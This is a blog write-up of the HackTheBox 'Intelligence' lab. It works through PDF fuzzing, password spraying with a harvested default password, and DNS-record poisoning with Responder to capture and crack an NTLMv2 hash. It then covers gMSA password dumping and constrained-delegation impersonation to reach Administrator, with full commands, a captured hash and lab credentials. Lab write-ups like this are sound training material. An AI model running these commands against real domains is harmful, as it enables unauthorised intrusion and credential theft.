HTB - Intelligence

HTB – Intelligence

In this walk through, we will be going through the Intelligence room from HackTheBox. This room is rated as Medium on the platform and it consists of password spraying of credentials captured from the internal PDF document. For privilege escalation, abuse of group managed service account privilege is used to perform constrained delegation attack which is used to access the DC and get root. So, let’s get started without any delay.

Intelligence

Machine Info:

TitleIntelligence
IPaddress10.10.10.248
DifficultyMedium
OSWindows
DescriptionIntelligence is a medium difficulty Windows machine in which we get initial foothold on the target by leveraging the credentials found in a internal PDF documents. For privilege escalation, a schedule Powershell script was abused to get the hash of the second user. This user is allowed to read the password of a group managed service account, which in turn has constrained delegation access to the DC.

Enumeration:

  • I started off with a regular nmap scan with Aggressive detection and found multiple ports opened as expected from a Windows machine. The key ports that was identified were – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139,445 (SMB), 389,636 (LDAP/LDAPS).

$ sudo nmap -A 10.10.10.248
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2023-12-14 23:00 IST
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.248, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:54402 > 10.10.10.248:53 S ttl=50 id=14929 iplen=44  seq=1595588214 win=1024 <mss 1460>
sendto in send_ip_packet_sd: sendto(5, packet, 44, 0, 10.10.10.248, 16) => Operation not permitted
Offending packet: TCP 10.10.14.24:54403 > 10.10.10.248:53 S ttl=47 id=31369 iplen=44  seq=1595653751 win=1024 <mss 1460>
Nmap scan report for 10.10.10.248
Host is up (0.18s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-12-15 01:30:40Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2023-12-14T17:29:11
|_Not valid after:  2024-12-13T17:29:11
|_ssl-date: 2023-12-15T01:32:10+00:00; +8h00m00s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-12-15T01:31:30
|_  start_date: N/A

TRACEROUTE (using port 135/tcp)
HOP RTT       ADDRESS
1   181.16 ms 10.10.14.1
2   182.50 ms 10.10.10.248

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.77 seconds

nmap scan

  • Also performed a full port scan and found bunch of more ports. One that may be useful was 5985 (WinRM).

sudo nmap -sS -p- -T5 10.10.10.248

all TCP port scan

  • Added the host names to my /etc/hosts file.

adding hostname

  • Tried to enumerate some usernames using RPC and LDAP but found nothing.

RPC and LDAP user enum

  • Next, enumerated the web server running on port 80 and found a static website running.

Intelligence website

  • One thing that caught my attention was the PDF document files in Announcement Document section.

some Documents found

  • Found some sample text inside it. Nothing useful.

Random PDF document

Random PDF document

  • Fired up gobuster on to the server to reveal some juicy directories. Found only one hit at /documents which we cannot access directly.

gobuster dir -u http://intelligence.htb/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt

gobuster scan

403 - Forbidden: Access denied

  • Going back to the PDF files, i looked at the URL carefully and i seems like the PDF files are uploaded as per the dates and named after it also. I changed some variable in the date and got a hit. That means, we can fuzz the application for the available PDF files.

http://intelligence.htb/documents/2020-01-02-upload.pdf

2020-01-02-upload.pdf

Another PDF document

  • Generated a list of dates for year 2020.

dates.txt

Fuzzing the application for PDF files

  • Next, used ffuf to fuzz the application for the PDF files and got a lot of hits.

$ ffuf -u http://intelligence.htb/documents/FUZZ-upload.pdf -w dates.txt

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://intelligence.htb/documents/FUZZ-upload.pdf
 :: Wordlist         : FUZZ: /home/wh1terose/CTF/HTB/machines/Intelligence/dates.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

2020-01-22              [Status: 200, Size: 28637, Words: 236, Lines: 224, Duration: 907ms]
2020-01-02              [Status: 200, Size: 27002, Words: 229, Lines: 199, 
Duration: 179ms]

-- snipped --

2020-12-30              [Status: 200, Size: 25109, Words: 218, Lines: 191, Duration: 179ms]
:: Progress: [366/366] :: Job [1/1] :: 87 req/sec :: Duration: [0:00:05] :: Errors: 0 ::

ffuf scan

ffuf result

  • Found a message regarding Internal IT Update which talks about a script that is developed by user Ted in order to notify the teams regarding any outages or attacks.

http://intelligence.htb/documents/2020-12-30-upload.pdf

Internal IT Update pdf

  • Meanwhile, i also tried to enumerate some shares using smbclient but found nothing.

SMB Enumeration

  • I downloaded the file containing the note to my local machine.

wget http://intelligence.htb/documents/2020-12-30-upload.pdf

downloading PDF

  • Looked inside its metadata and found the Creator name – Jason.Patterson.

exiftool 2020-12-30-upload.pdf

Looking at its metadata

  • I generated a list again for dates including year 2020 and 2021 and got many successful hits. Next, we have to download them in order to get atleast some potential usernames.

ffuf scan

  • Used the below commands to make the URL as per our requirement.

cut -d " " -f 1 files.txt > final.txt
head final.txt

final dates

sed -e 's/$/-upload.pdf/' -i final.txt 

adding upload.pdf

awk '$0="http://intelligence.htb/documents/"$0' final.txt > pdflist.txt

creating URL for download

  • Downloaded all the PDF file to my local machine using wget.

wget -i pdflist.txt 

Downloading all PDF files

  • Found a default Account password in one of the PDF files – NewIntelligenceCorpUser9876.

Found password

  • Next, i used metaforge to extract all the meta data from the PDF files and save it in one location.

python3 ~/Tools/Metaforge/metaforge.py

Using Metaforge

Scan Finished

Viewing the report

  • Used below Linux-fu to get the usernames from all the captured metadata.

grep Creator *-upload.pdf.json | cut -d ":" -f 4 | tr "," " " | tr -d '"' > usernames.txt

usernames.txt

  • Performed a password spray on the usernames list we generated with the default password. Got a hit for – Tiffany.Molina.

$ crackmapexec smb 10.10.10.248 -u usernames.txt -p 'NewIntelligenceCorpUser9876'
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [-] STATUS_LOGON_FAILURE 

-- snipped -- 

SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 

crackmapexec password spray

Successful hit for Tiffany user

  • Tried to get shell access with user Tiffany.Molina but was denied.

No shell via Winrm

Initial Access:

  • Next, checked the SMB permissions for the user and found an interesting directory – Users.

smbmap -H 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876

Using Tiffany creds with SMB

downdetector.ps1 found

  • Got access to the Users share and captured the user flag.

$ smbclient //10.10.10.248/Users --user Tiffany.Molina --password NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Mon Apr 19 06:50:26 2021
  ..                                 DR        0  Mon Apr 19 06:50:26 2021
  Administrator                       D        0  Mon Apr 19 05:48:39 2021
  All Users                       DHSrn        0  Sat Sep 15 12:51:46 2018
  Default                           DHR        0  Mon Apr 19 07:47:40 2021
  Default User                    DHSrn        0  Sat Sep 15 12:51:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 12:41:27 2018
  Public                             DR        0  Mon Apr 19 05:48:39 2021
  Ted.Graves                          D        0  Mon Apr 19 06:50:26 2021
  Tiffany.Molina                      D        0  Mon Apr 19 06:21:46 2021

		3770367 blocks of size 4096. 1405400 blocks available
smb: \> cd Tiffany.Molina\
smb: \Tiffany.Molina\> ls
  .                                   D        0  Mon Apr 19 06:21:46 2021
  ..                                  D        0  Mon Apr 19 06:21:46 2021
  AppData                            DH        0  Mon Apr 19 06:21:46 2021
  Application Data                DHSrn        0  Mon Apr 19 06:21:46 2021
  Cookies                         DHSrn        0  Mon Apr 19 06:21:46 2021
  Desktop                            DR        0  Mon Apr 19 06:21:46 2021
  Documents                          DR        0  Mon Apr 19 06:21:46 2021
  Downloads                          DR        0  Sat Sep 15 12:42:33 2018
  Favorites                          DR        0  Sat Sep 15 12:42:33 2018
  Links                              DR        0  Sat Sep 15 12:42:33 2018
  Local Settings                  DHSrn        0  Mon Apr 19 06:21:46 2021
  Music                              DR        0  Sat Sep 15 12:42:33 2018
  My Documents                    DHSrn        0  Mon Apr 19 06:21:46 2021
  NetHood                         DHSrn        0  Mon Apr 19 06:21:46 2021
  NTUSER.DAT                        AHn   131072  Thu Dec 14 15:19:09 2023
  ntuser.dat.LOG1                   AHS    86016  Mon Apr 19 06:21:46 2021
  ntuser.dat.LOG2                   AHS        0  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TM.blf    AHS    65536  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000001.regtrans-ms    AHS   524288  Mon Apr 19 06:21:46 2021
  NTUSER.DAT{6392777f-a0b5-11eb-ae6e-000c2908ad93}.TMContainer00000000000000000002.regtrans-ms    AHS   524288  Mon Apr 19 06:21:46 2021
  ntuser.ini                        AHS       20  Mon Apr 19 06:21:46 2021
  Pictures                           DR        0  Sat Sep 15 12:42:33 2018
  Recent                          DHSrn        0  Mon Apr 19 06:21:46 2021
  Saved Games                         D        0  Sat Sep 15 12:42:33 2018
  SendTo                          DHSrn        0  Mon Apr 19 06:21:46 2021
  Start Menu                      DHSrn        0  Mon Apr 19 06:21:46 2021
  Templates                       DHSrn        0  Mon Apr 19 06:21:46 2021
  Videos                             DR        0  Sat Sep 15 12:42:33 2018

		3770367 blocks of size 4096. 1405400 blocks available
smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
  .                                  DR        0  Mon Apr 19 06:21:46 2021
  ..                                 DR        0  Mon Apr 19 06:21:46 2021
  user.txt                           AR       34  Thu Dec 14 15:09:41 2023

		3770367 blocks of size 4096. 1405400 blocks available
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\> exit

Accessing the SMB share - Users

user.txt found

user flag

  • Another interesting share that holds yet another interesting file was – IT. Got access inside it and downloaded the powershell script named downdetector.ps1.

smbclient //10.10.10.248/IT --user Tiffany.Molina --password NewIntelligenceCorpUser9876

get downdetector.ps1 

downloading downdetector.ps1

  • Looked inside the downdetector script and found that it is the same script that user Ted has set up as per the notes. The script is checking for any DNS records starting from web and then using Ted creds using -UserDefaultCredentials to send an email to Ted notifying the potential attack.

cat downdetector.ps1

cat downdetector.ps1

Lateral Movement:

  • We can take advantage of this and capture user Ted’s NTLM hash via Responder. For that, we have to set up a fake DNS record starting with string “Web” and which resolves to our Responder listener IP. Once the script checks the newly configured DNS record, it will send a alert using Ted’s creds and at that time, we will be able to capture the hash. I used dnstool to add a DNS record.

python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record webfake --data 10.10.14.17 10.10.10.248

dnstool.py

  • Set up responder for the attack. Within 5 minutes, i was blessed with the NTLMV2 hash of user Ted.Graves.

sudo responder -I tun0 -v

Setting up Responder

Captured Ted.Graves hash

Ted.Graves::intelligence:b1cfe264a50ed5c7:B2C10F808E9EFC93C238CDBAF1D3DE85:0101000000000000CC594EFAB82FDA018303CE6123B8DDDB0000000002000800570036004F00510001001E00570049004E002D00420050005400470043004A004D00340030004400590004001400570036004F0051002E004C004F00430041004C0003003400570049004E002D00420050005400470043004A004D0034003000440059002E00570036004F0051002E004C004F00430041004C0005001400570036004F0051002E004C004F00430041004C0008003000300000000000000000000000002000002003AAB437CFF3C3635772FB56BADB1F7B83CA2EB3A9528EB46F5F34FDBA37650A0010000000000000000000000000000000000009003A0048005400540050002F00770065006200660061006B0065002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

  • Cracked the hash using hashcat and got the password.

sudo hashcat -m 5600 hash.txt /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -O

Ted.Graves hash cracked

  • Next, using the found credentials used Bloodhound.py in order to retrieve information from the domain.

$ bloodhound-python -c all -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb -gc intelligence.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to GC LDAP server: intelligence.htb
INFO: Connecting to LDAP server: intelligence.htb
INFO: Found 43 users
INFO: Found 55 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.intelligence.htb
INFO: Done in 00M 53S

Bloodhound enumeration

  • Uploaded the data to Bloodhound and looked for the “Shortest Path to Domain Admins”. The path shows that we can get access to user SVC_INT, then we will be allowed to delegate to the DC. We can access SVC_INT from our current owned user via ITSUPPORT group as it has ReadGMSAPassword permissions set to it.

Shortest Path to Domain Admins

Can ReadGMSAPassword

  • I looked into the help for the vulnerability and got to know that we can abuse it using gMSADumper tool.

ReadGMSAPassword abuse

ReadGMSAPassword abuse

  • I used the same and dumped the hash for user svc_backup.

python3 ~/Tools/gMSADumper/gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb

using gMSADumper to dump the hash

Privilege Escalation:

  • Next, i performed Constrained delegation attack from svc_backup on DC to impersonate as Administrator and get a TGT for it.

AllowedToDelegate privilege

AllowedToDelegate abuse

sudo ntpdate 10.10.10.248

getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :d4a0554f26a9f3df13720481e07e0a3f -impersonate administrator intelligence.htb/svc_int

export KRB5CCNAME=administrator.ccache

creating a TGT as admin

  • Used the dumped TGT to get shell access on the target using psexec as Administrator.

psexec.py -k -no-pass dc.intelligence.htb

Getting root

  • Finally captured the root flag and completed the room.

root flag

machine completed

Also Read: HTB – Flight

Conclusion:

Conclusion

So that was “Intelligence” for you. The machine features a Windows machine that showcases a number of common attacks in an Active Directory environment. After retrieving internal PDF documents stored on the web server (by brute-forcing a common naming scheme) and inspecting their contents and metadata, which reveal a default password and a list of potential AD users. Then we performed password spraying which leads to the discovery of a valid user account, granting us initial foothold on the system. Post that, A scheduled PowerShell script that sends authenticated requests to web servers based on their hostname was discovered. So, by adding a custom DNS record, it was possible for us to force a request that can be intercepted to capture the hash of a second user, which was easily crackable. This user was allowed to read the password of a group managed service account, which in turn has constrained delegation access to the domain controller, resulting in a shell with administrative privileges. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top